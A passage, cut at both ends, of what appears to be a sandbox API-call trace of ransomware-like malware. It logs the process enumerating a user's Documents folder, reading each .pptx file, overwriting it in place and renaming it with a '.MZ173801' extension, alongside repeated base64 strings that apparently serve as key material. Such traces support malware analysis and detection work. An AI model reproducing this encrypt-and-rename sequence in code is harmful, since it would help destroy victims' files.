ftLastWriteTime.dwHighDateTime=0x1d57ccd, nFileSizeHigh=0x0, nFileSizeLow=0x10ecd)) returned 1 [0121.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.835] GetCurrentThreadId () returned 0x1358 [0121.835] GetCurrentThreadId () returned 0x1358 [0121.835] GetCurrentThreadId () returned 0x1358 [0121.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.835] GetCurrentThreadId () returned 0x1358 [0121.835] GetCurrentThreadId () returned 0x1358 [0121.835] GetCurrentThreadId () returned 0x1358 [0121.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vTIt-8amnULMnTybMLk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vtit-8amnulmntybmlk.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.886] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.886] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.886] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x10ecd [0121.886] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.886] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x10ecd, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x10ecd, lpOverlapped=0x0) returned 1 [0121.888] CloseHandle (hObject=0x3fc) returned 1 [0121.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vTIt-8amnULMnTybMLk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vtit-8amnulmntybmlk.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.890] WriteFile (in: hFile=0x3fc, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x10ecd, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x10ecd, lpOverlapped=0x0) returned 1 [0121.892] CloseHandle (hObject=0x3fc) returned 1 [0121.894] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\vTIt-8amnULMnTybMLk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vtit-8amnulmntybmlk.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\vTIt-8amnULMnTybMLk.pptx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\vtit-8amnulmntybmlk.pptx.mz173801")) returned 1 [0121.895] GetCurrentThreadId () returned 0x1358 [0121.895] GetCurrentThreadId () returned 0x1358 [0121.895] GetCurrentThreadId () returned 0x1358 [0121.895] GetCurrentThreadId () returned 0x1358 [0121.895] GetCurrentThreadId () returned 0x1358 [0121.895] GetCurrentThreadId () returned 0x1358 [0121.895] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad77410, ftCreationTime.dwHighDateTime=0x1d595b9, ftLastAccessTime.dwLowDateTime=0x49c140f0, ftLastAccessTime.dwHighDateTime=0x1d57bd5, ftLastWriteTime.dwLowDateTime=0x49c140f0, ftLastWriteTime.dwHighDateTime=0x1d57bd5, nFileSizeHigh=0x0, nFileSizeLow=0x6eab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vyqzJRG.pptx", cAlternateFileName="VYQZJR~1.PPT")) returned 1 [0121.895] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.895] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\vyqzJRG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vyqzjrg.pptx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad77410, ftCreationTime.dwHighDateTime=0x1d595b9, ftLastAccessTime.dwLowDateTime=0x49c140f0, ftLastAccessTime.dwHighDateTime=0x1d57bd5, ftLastWriteTime.dwLowDateTime=0x49c140f0, ftLastWriteTime.dwHighDateTime=0x1d57bd5, nFileSizeHigh=0x0, nFileSizeLow=0x6eab)) returned 1 [0121.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.896] GetCurrentThreadId () returned 0x1358 [0121.896] GetCurrentThreadId () returned 0x1358 [0121.896] GetCurrentThreadId () returned 0x1358 [0121.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.897] GetCurrentThreadId () returned 0x1358 [0121.897] GetCurrentThreadId () returned 0x1358 [0121.897] GetCurrentThreadId () returned 0x1358 [0121.897] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vyqzJRG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vyqzjrg.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.897] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.897] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.897] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x6eab [0121.897] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.897] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x6eab, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x6eab, lpOverlapped=0x0) returned 1 [0121.898] CloseHandle (hObject=0x3fc) returned 1 [0121.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\vyqzJRG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vyqzjrg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.900] WriteFile (in: hFile=0x3fc, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x6eab, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f9bc*=0x6eab, lpOverlapped=0x0) returned 1 [0121.901] CloseHandle (hObject=0x3fc) returned 1 [0121.902] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\vyqzJRG.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vyqzjrg.pptx"), 